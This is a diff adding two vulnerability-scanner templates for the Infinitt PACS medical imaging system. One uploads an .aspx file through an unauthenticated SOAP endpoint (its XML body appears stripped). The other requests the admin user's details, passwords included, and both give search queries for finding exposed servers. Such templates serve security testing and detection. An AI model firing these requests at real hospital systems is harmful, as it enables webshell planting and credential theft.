diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
new file mode 100644
index 00000000000..97a980dd5cd
--- /dev/null
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
@@ -0,0 +1,56 @@
+id: infinitt-pacs-file-upload
+
+info:
+ name: Infinitt PACS System - Arbitary File Upload
+ author: adeljck
+ severity: critical
+ description: |
+ Infinitt PACS System is vulnerable to file upload vulnerability which allows an attacker to upload a webshell and gain unauthorized access to the server.
+ remediation: |
+ Ensure that file uploads are properly validated and sanitized. Implement strict access controls and monitoring to detect and prevent unauthorized file uploads.
+ reference:
+ - https://github.com/wy876/POC/blob/a9e4000fc76d0157b53ade916323b7b8256b17c3/%E8%8B%B1%E9%A3%9E%E8%BE%BE%E5%8C%BB%E5%AD%A6%E5%BD%B1%E5%83%8F%E5%AD%98%E6%A1%A3%E4%B8%8E%E9%80%9A%E4%BF%A1%E7%B3%BB%E7%BB%9F/%E8%8B%B1%E9%A3%9E%E8%BE%BE%E5%8C%BB%E5%AD%A6%E5%BD%B1%E5%83%8F%E5%AD%98%E6%A1%A3%E4%B8%8E%E9%80%9A%E4%BF%A1%E7%B3%BB%E7%BB%9FWebJobUpload%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: icon_hash="1474455751" || icon_hash="702238928"
+ tags: infinitt,file-upload,intrusive,rce
+
+variables:
+ filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+ - raw:
+ - |
+ POST /webservices/WebJobUpload.asmx HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml; charset=utf-8
+ Soapaction: "http://rainier/jobUpload"
+
+
+
+
+
+ 1
+
+ {{filename}}.aspx
+ MTIz
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: content_type
+ words:
+ - "text/xml"
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
new file mode 100644
index 00000000000..f94d699233a
--- /dev/null
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
@@ -0,0 +1,38 @@
+id: infinitt-pacs-info-disclosure
+
+info:
+ name: Infinitt PACS System - Information Disclosure
+ author: adeljck
+ severity: high
+ description: |
+ Infinitt PACS System is vulnerable to an Information Disclosure vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
+ remediation: |
+ Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information.
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: icon_hash="1474455751" || icon_hash="702238928"
+ tags: infinitt,disclosure,exposure
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - ""
+ condition: and
+
+ - type: word
+ part: content_type
+ words:
+ - "text/xml"
+
+ - type: status
+ status:
+ - 200